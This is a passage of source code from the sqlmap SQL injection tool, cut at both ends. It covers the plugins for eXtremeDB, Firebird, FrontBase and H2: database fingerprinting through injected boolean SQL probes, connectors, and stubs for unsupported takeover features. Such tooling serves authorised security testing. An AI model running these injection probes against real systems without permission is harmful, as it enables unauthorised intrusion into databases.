fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(EXTREMEDB_ALIASES):\n            setDbms(DBMS.EXTREMEDB)\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.EXTREMEDB\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"signature(NULL)=usignature(NULL)\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.EXTREMEDB\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"hashcode(NULL)>=0\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.EXTREMEDB\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.EXTREMEDB)\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.EXTREMEDB\n            logger.warning(warnMsg)\n\n            return False\n\n    def forceDbmsEnum(self):\n        conf.db = (\"%s%s\" % (DBMS.EXTREMEDB, METADB_SUFFIX)).replace(' ', '_')\n"
  },
  {
    "path": "sqlmap/plugins/dbms/extremedb/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT 'abcdefgh' FROM foobar\"\n        True\n        \"\"\"\n\n        return expression\n"
  },
  {
    "path": "sqlmap/plugins/dbms/extremedb/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on eXtremeDB it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on eXtremeDB it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on eXtremeDB it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on eXtremeDB it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/firebird/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import FIREBIRD_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.firebird.enumeration import Enumeration\nfrom plugins.dbms.firebird.filesystem import Filesystem\nfrom plugins.dbms.firebird.fingerprint import Fingerprint\nfrom plugins.dbms.firebird.syntax import Syntax\nfrom plugins.dbms.firebird.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass FirebirdMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Firebird methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = FIREBIRD_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.FIREBIRD] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/firebird/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import kinterbasdb\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.settings import UNICODE_ENCODING\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: http://kinterbasdb.sourceforge.net/\n    User guide: http://kinterbasdb.sourceforge.net/dist_docs/usage.html\n    Debian package: python-kinterbasdb\n    License: BSD\n    \"\"\"\n\n    # sample usage:\n    # ./sqlmap.py -d \"firebird://sysdba:testpass@/opt/firebird/testdb.fdb\"\n    # ./sqlmap.py -d \"firebird://sysdba:testpass@127.0.0.1:3050//opt/firebird/testdb.fdb\"\n    def connect(self):\n        self.initConnection()\n\n        if not self.hostname:\n            self.checkFileDb()\n\n        try:\n            # Reference: http://www.daniweb.com/forums/thread248499.html\n            self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset=\"UTF8\")\n        except kinterbasdb.OperationalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except kinterbasdb.OperationalError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        try:\n            self.cursor.execute(query)\n        except kinterbasdb.OperationalError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n        except kinterbasdb.Error as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n    def select(self, query):\n        self.execute(query)\n        return self.fetchall()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/firebird/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getDbs(self):\n        warnMsg = \"on Firebird it is not possible to enumerate databases (use only '--tables')\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getPasswordHashes(self):\n        warnMsg = \"on Firebird it is not possible to enumerate the user password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def searchDb(self):\n        warnMsg = \"on Firebird it is not possible to search databases\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getHostname(self):\n        warnMsg = \"on Firebird it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getStatements(self):\n        warnMsg = \"on Firebird it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/firebird/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on Firebird it is not possible to read files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"on Firebird it is not possible to write files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/firebird/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.common import randomRange\nfrom lib.core.common import randomStr\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import FIREBIRD_ALIASES\nfrom lib.core.settings import METADB_SUFFIX\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.FIREBIRD)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n        actVer = Format.getDbms()\n\n        if not conf.extensiveFp:\n            value += actVer\n            return value\n\n        actVer = Format.getDbms() + \" (%s)\" % (self._dialectCheck())\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                if re.search(r\"-log$\", kb.data.banner or \"\"):\n                    banVer += \", logging enabled\"\n\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def _sysTablesCheck(self):\n        retVal = None\n        table = (\n            (\"1.0\", (\"EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)\",)),\n            (\"1.5\", (\"NULLIF(%d,%d) IS NULL\", \"EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)\")),\n            (\"2.0\", (\"EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)\", \"BIT_LENGTH(%d)>0\", \"CHAR_LENGTH(%d)>0\")),\n            (\"2.1\", (\"BIN_XOR(%d,%d)=0\", \"PI()>0.%d\", \"RAND()<1.%d\", \"FLOOR(1.%d)>=0\")),\n            (\"2.5\", (\"'%s' SIMILAR TO '%s'\",)),  # Reference: https://firebirdsql.org/refdocs/langrefupd25-similar-to.html\n            (\"3.0\", (\"FALSE IS FALSE\",)),  # https://www.firebirdsql.org/file/community/conference-2014/pdf/02_fb.2014.whatsnew.30.en.pdf\n        )\n\n        for i in xrange(len(table)):\n            version, checks = table[i]\n            failed = False\n            check = checks[randomRange(0, len(checks) - 1)].replace(\"%d\", getUnicode(randomRange(1, 100))).replace(\"%s\", getUnicode(randomStr()))\n            result = inject.checkBooleanExpression(check)\n\n            if result:\n                retVal = version\n            else:\n                failed = True\n                break\n\n            if failed:\n                break\n\n        return retVal\n\n    def _dialectCheck(self):\n        retVal = None\n\n        if Backend.getIdentifiedDbms():\n            result = inject.checkBooleanExpression(\"EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)\")\n            retVal = \"dialect 3\" if result else \"dialect 1\"\n\n        return retVal\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(FIREBIRD_ALIASES):\n            setDbms(\"%s %s\" % (DBMS.FIREBIRD, Backend.getVersion()))\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.FIREBIRD\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"(SELECT COUNT(*) FROM RDB$DATABASE WHERE [RANDNUM]=[RANDNUM])>0\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.FIREBIRD\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.FIREBIRD\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.FIREBIRD)\n\n            infoMsg = \"actively fingerprinting %s\" % DBMS.FIREBIRD\n            logger.info(infoMsg)\n\n            version = self._sysTablesCheck()\n\n            if version is not None:\n                Backend.setVersion(version)\n                setDbms(\"%s %s\" % (DBMS.FIREBIRD, version))\n\n            self.getBanner()\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.FIREBIRD\n            logger.warning(warnMsg)\n\n            return False\n\n    def forceDbmsEnum(self):\n        conf.db = \"%s%s\" % (DBMS.FIREBIRD, METADB_SUFFIX)\n\n        if conf.tbl:\n            conf.tbl = conf.tbl.upper()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/firebird/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import isDBMSVersionAtLeast\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> from lib.core.common import Backend\n        >>> Backend.setVersion('2.0')\n        ['2.0']\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT 'abcdefgh' FROM foobar\"\n        True\n        >>> Backend.setVersion('2.1')\n        ['2.1']\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT ASCII_CHAR(97)||ASCII_CHAR(98)||ASCII_CHAR(99)||ASCII_CHAR(100)||ASCII_CHAR(101)||ASCII_CHAR(102)||ASCII_CHAR(103)||ASCII_CHAR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"ASCII_CHAR(%d)\" % _ for _ in getOrds(value))\n\n        retVal = expression\n\n        if isDBMSVersionAtLeast(\"2.1\"):\n            retVal = Syntax._escape(expression, quote, escaper)\n\n        return retVal\n"
  },
  {
    "path": "sqlmap/plugins/dbms/firebird/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on Firebird it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on Firebird it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on Firebird it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on Firebird it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/frontbase/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import FRONTBASE_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.frontbase.enumeration import Enumeration\nfrom plugins.dbms.frontbase.filesystem import Filesystem\nfrom plugins.dbms.frontbase.fingerprint import Fingerprint\nfrom plugins.dbms.frontbase.syntax import Syntax\nfrom plugins.dbms.frontbase.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass FrontBaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines FrontBase methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = FRONTBASE_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.FRONTBASE] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/frontbase/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    def connect(self):\n        errMsg = \"on FrontBase it is not (currently) possible to establish a \"\n        errMsg += \"direct connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/frontbase/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getBanner(self):\n        warnMsg = \"on FrontBase it is not possible to get the banner\"\n        logger.warning(warnMsg)\n\n        return None\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on FrontBase it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getHostname(self):\n        warnMsg = \"on FrontBase it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getStatements(self):\n        warnMsg = \"on FrontBase it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/frontbase/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on FrontBase it is not possible to read files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"on FrontBase it is not possible to write files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/frontbase/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import FRONTBASE_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.FRONTBASE)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.FRONTBASE\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(FRONTBASE_ALIASES):\n            setDbms(DBMS.FRONTBASE)\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.FRONTBASE\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"(SELECT degradedTransactions FROM INFORMATION_SCHEMA.IO_STATISTICS)>=0\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.FRONTBASE\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"(SELECT TOP (0,1) file_version FROM INFORMATION_SCHEMA.FRAGMENTATION)>=0\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.FRONTBASE\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.FRONTBASE)\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.FRONTBASE\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/frontbase/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT 'abcdefgh' FROM foobar\"\n        True\n        \"\"\"\n\n        return expression\n"
  },
  {
    "path": "sqlmap/plugins/dbms/frontbase/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on FrontBase it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on FrontBase it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on FrontBase it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on FrontBase it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/h2/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import H2_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.h2.enumeration import Enumeration\nfrom plugins.dbms.h2.filesystem import Filesystem\nfrom plugins.dbms.h2.fingerprint import Fingerprint\nfrom plugins.dbms.h2.syntax import Syntax\nfrom plugins.dbms.h2.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass H2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines H2 methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = H2_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.H2] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/h2/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    def connect(self):\n        errMsg = \"on H2 it is not (currently) possible to establish a \"\n        errMsg += \"direct connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/h2/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import H2_DEFAULT_SCHEMA\nfrom lib.request import inject\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getBanner(self):\n        if not conf.getBanner:\n            return\n\n        if kb.data.banner is None:\n            infoMsg = \"fetching banner\"\n            logger.info(infoMsg)\n\n            query = queries[DBMS.H2].banner.query\n            kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True))\n\n        return kb.data.banner\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on H2 it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getHostname(self):\n        warnMsg = \"on H2 it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getCurrentDb(self):\n        return H2_DEFAULT_SCHEMA\n\n    def getPasswordHashes(self):\n        warnMsg = \"on H2 it is not possible to enumerate password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getStatements(self):\n        warnMsg = \"on H2 it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/h2/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on H2 it is not possible to read files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"on H2 it is not possible to write files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/h2/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import FORK\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import H2_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.H2)\n\n    def getFingerprint(self):\n        fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)\n\n        if fork is None:\n            if inject.checkBooleanExpression(\"EXISTS(SELECT * FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME='IGNITE')\"):\n                fork = FORK.IGNITE\n            else:\n                fork = \"\"\n\n            hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)\n\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.H2\n            if fork:\n                value += \" (%s fork)\" % fork\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        if fork:\n            value += \"\\n%sfork fingerprint: %s\" % (blank, fork)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(H2_ALIASES):\n            setDbms(\"%s %s\" % (DBMS.H2, Backend.getVersion()))\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.H2\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"ZERO() IS 0\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.H2\n            